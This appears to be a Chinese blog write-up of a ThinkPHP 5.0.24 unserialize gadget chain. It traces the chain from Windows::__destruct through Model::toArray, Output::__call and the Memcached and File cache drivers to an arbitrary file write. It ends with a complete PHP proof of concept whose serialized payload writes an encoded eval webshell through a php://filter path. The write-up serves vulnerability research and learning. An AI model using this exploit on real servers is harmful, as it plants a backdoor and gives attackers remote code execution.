Thinkphp 5.0.24反序列化文件写
学了也快一年了 头一次去审计经典的框架洞。(反序列化其实一直不是很熟,所以借这次机会希望能更多的增长知识) 其实网上的链子已经非常多了 呜呜 我真的菜
环境搭建
compose
一把索 然后发现./think
不能执行 那就不执行好了
PHPstorm
配置 xdebug
写个 index
控制器控制下反序列化,就正式开始了
<?php
namespace app\index\controller;
class Index
{
public function index($ha1c9on='')
{
echo "Welcome thinkphp 5.0.24";
echo ha1c9on;
unserialize(base64_decode($ha1c9on));
}
}
反序列化寻找
写的详细一点,尽量去自己一步步找到链子 而不是看网上的分析
首先反序列化入手点应该不用多说了__destruct
全局搜了下
一共有四个 跟进thinkphp/library/think/process/pipes/Windows.php
下的__destruct
发现其调用了removeFiles
方法
继续跟进
可以发现 这里存在file_exists
函数 而这个函数可以调用__toString
方法
为什么<code>file_exists
函数 可以调用__toString
方法file__exists
处理的时候会将当作字符串来处理
所以我们全局搜一下__toString
没几个 跟一下 toJson
调用了toArray
方法
发现如果类是Model
的话 会再次调用 Model
类 下的toArray
方法
然后发现Model
类下也有这个__toString
->>toArray
方法
那还挑啥 直接用 model
类就完事了 看看这个toArray
方法干啥了
public function toArray()
{
$item = [];
$visible = [];
$hidden = [];
$data = array_merge($this->data, $this->relation);
// 过滤属性
if (!empty($this->visible)) {
$array = $this->parseAttr($this->visible, $visible);
$data = array_intersect_key($data, array_flip($array));
} elseif (!empty($this->hidden)) {
$array = $this->parseAttr($this->hidden, $hidden, false);
$data = array_diff_key($data, array_flip($array));
}
foreach ($data as $key => $val) {
if ($val instanceof Model || $val instanceof ModelCollection) {
// 关联模型对象
$item[$key] = $this->subToArray($val, $visible, $hidden, $key);
} elseif (is_array($val) && reset($val) instanceof Model) {
// 关联模型数据集
$arr = [];
foreach ($val as $k => $value) {
$arr[$k] = $this->subToArray($value, $visible, $hidden, $key);
}
$item[$key] = $arr;
} else {
// 模型属性
$item[$key] = $this->getAttr($key);
}
}
// 追加属性(必须定义获取器)
if (!empty($this->append)) {
foreach ($this->append as $key => $name) {
if (is_array($name)) {
// 追加关联对象属性
$relation = $this->getAttr($key);
$item[$key] = $relation->append($name)->toArray();
} elseif (strpos($name, '.')) {
list($key, $attr) = explode('.', $name);
// 追加关联对象属性
$relation = $this->getAttr($key);
$item[$key] = $relation->append([$attr])->toArray();
} else {
$relation = Loader::parseName($name, 1, false);
if (method_exists($this, $relation)) {
$modelRelation = $this->$relation();
$value = $this->getRelationData($modelRelation);
if (method_exists($modelRelation, 'getBindAttr')) {
$bindAttr = $modelRelation->getBindAttr();
if ($bindAttr) {
foreach ($bindAttr as $key => $attr) {
$key = is_numeric($key) ? $attr : $key;
if (isset($this->data[$key])) {
throw new Exception('bind attr has exists:' . $key);
} else {
$item[$key] = $value ? $value->getAttr($attr) : null;
}
}
continue;
}
}
$item[$name] = $value;
} else {
$item[$name] = $this->getAttr($name);
}
}
}
}
return !empty($item) ? $item : [];
}
真的长 仔细看看
大概也许似乎估计差不多这三处可以调用__call
方法
这里看最后一个
首先大前提是
if (!empty($this->append))
if (method_exists($this, $relation))
if (method_exists($modelRelation, 'getBindAttr'))
if ($bindAttr)
且不满足
if (is_array($name))
elseif (strpos($name, '.'))
if (isset($this->data[$key]))
这里是最难的地方 让我们详细看看怎么办 首先是
$relation
由append
控制,要满足其不存在 才会进到if
下 之后看最后一个else
怎么进,也就是这里
可以发现$value
来自getRelationData
方法处理$modelRelation
后,而$modelRelation
是$relation
被Loader::parseName
处理之后作为方法名的返回值
跟进Loader::parseName
当type=1
时候 进入if
把大写字母中间加上_再转小写,也就是$modelRelation
就是一个Model
类任意方法的返回值
看看getRelationData
怎么处理的$modelRelation
要求参数是Relation
类 所有要找一个可以返回Realtion
类对象,经过查找,可以将$modelRelation
设为getError
继续看
首先需要进入的是Relation
类型的对象,并且要符合这个关键判断
$this->parent && !$modelRelation->isSelfRelation() && get_class($modelRelation->getModel()) == get_class($this->parent)
才能让$value变成我们想要的东西
首先需要$modelRelation
为Relation
类型。全局查找getRelation
方法且为Relation
类型的类,找到了HasOne(/thinkphp/library/think/model/relation/HasOne.php)
然后继续看model
下面的if
跟进getBindAttr
直接可控 进入$item[$key] = $value ? $value->getAttr($attr) : null;
进入__call
方法
全局搜一下call
方法
最终漏洞点在这
然后我们跟一下block
跟writeln
然后我们发现handle
可控
那就可以全局搜一下write
方法
定位到thinkphp/library/think/session/driver/Memcached.php
依旧handle
可控 ,搜set
定位到thinkphp/library/think/cache/driver/File.php
跟进这里的getCacheKey
方法 看看文件名是不是可控
$filename = $this->options['path'] . $name . '.php';
options
可控 文件名可控 然后看看content
跟进
if ($result) {
isset($first) && $this->setTagItem($filename);
clearstatcache();
return true;
} else {
return false;
}
中setTagItem
发现value
的值就为传进来的filename
又调用了一次set
,且此处两个参数都是可控的
所以可以在文件名处搞事情,通过编码然后将文件名写入shell
中 所以成功写入shell
总结流程
thinkphp/library/think/process/pipes/Windows.php
中<strong>destruct()
的$this->removeFiles();
触发</strong>toString
thinkphp/library/think/Model.php
中__toString
-> toJson
-> toArray
toArray
方法中$relation
由append
控制,要求参数是Relation
类 所有要找一个可以返回Realtion
类对象,经过查找,可以将$modelRelation
设为getError
继续跟进getRelationData
首先需要进入的是Relation
类型的对象,并且要符合这个关键判断
$this->parent && !$modelRelation->isSelfRelation() && get_class($modelRelation->getModel()) == get_class($this->parent)
才能让$value
变成我们想要的东西,需要$modelRelation
为Relation
类型。全局查找getRelation
方法且为Relation
类型的类,找到了HasOne(/thinkphp/library/think/model/relation/HasOne.php)
跟进$bindAttr = $modelRelation->getBindAttr();
中的getBindAttr()
,BindAttr
可控 进入
__call
方法
thinkphp/library/think/console/Output.php
中__call
中跟进block
-> writeln
-> write
-> handle
可控
thinkphp/library/think/session/driver/Memcache.php
中write
方法handle
可控 调用set
thinkphp/library/think/cache/driver/File.php
中set
方法filename
->getCacheKey
中options
可控 文件内容写入成功后 会调用 setTagItem
方法 其中$name
可控 再次调用set
方法 可以在文件名处使用伪协议编码写入shell
POC
<?php
namespace think\process\pipes {
class Windows {
private $files = [];
public function __construct($files)
{
$this->files = [$files]; //$file => /think/Model的子类new Pivot(); Model是抽象类
}
}
}
namespace think {
abstract class Model{
protected $append = [];
protected $error = null;
public $parent;
function __construct($output, $modelRelation)
{
$this->parent = $output; //$this->parent=> think\console\Output;
$this->append = array("xxx"=>"getError"); //调用getError 返回this->error
$this->error = $modelRelation; // $this->error 要为 relation类的子类,并且也是OnetoOne类的子类==>>HasOne
}
}
}
namespace think\model{
use think\Model;
class Pivot extends Model{
function __construct($output, $modelRelation)
{
parent::__construct($output, $modelRelation);
}
}
}
namespace think\model\relation{
class HasOne extends OneToOne {
}
}
namespace think\model\relation {
abstract class OneToOne
{
protected $selfRelation;
protected $bindAttr = [];
protected $query;
function __construct($query)
{
$this->selfRelation = 0;
$this->query = $query; //$query指向Query
$this->bindAttr = ['xxx'];// $value值,作为call函数引用的第二变量
}
}
}
namespace think\db {
class Query {
protected $model;
function __construct($model)
{
$this->model = $model; //$this->model=> think\console\Output;
}
}
}
namespace think\console{
class Output{
private $handle;
protected $styles;
function __construct($handle)
{
$this->styles = ['getAttr'];
$this->handle =$handle; //$handle->think\session\driver\Memcached
}
}
}
namespace think\session\driver {
class Memcached
{
protected $handler;
function __construct($handle)
{
$this->handler = $handle; //$handle->think\cache\driver\File
}
}
}
namespace think\cache\driver {
class File
{
protected $options=null;
protected $tag;
function __construct(){
$this->options=[
'expire' => 3600,
'cache_subdir' => false,
'prefix' => '',
'path' => 'php://filter/convert.iconv.utf-8.utf-7|convert.base64-decode/resource=aaaPD9waHAgQGV2YWwoJF9QT1NUWydjY2MnXSk7Pz4g/../a.php',
'data_compress' => false,
];
$this->tag = 'xxx';
}
}
}
namespace {
$Memcached = new think\session\driver\Memcached(new \think\cache\driver\File());
$Output = new think\console\Output($Memcached);
$model = new think\db\Query($Output);
$HasOne = new think\model\relation\HasOne($model);
$window = new think\process\pipes\Windows(new think\model\Pivot($Output,$HasOne));
//echo serialize($window);
echo base64_encode(serialize($window));
}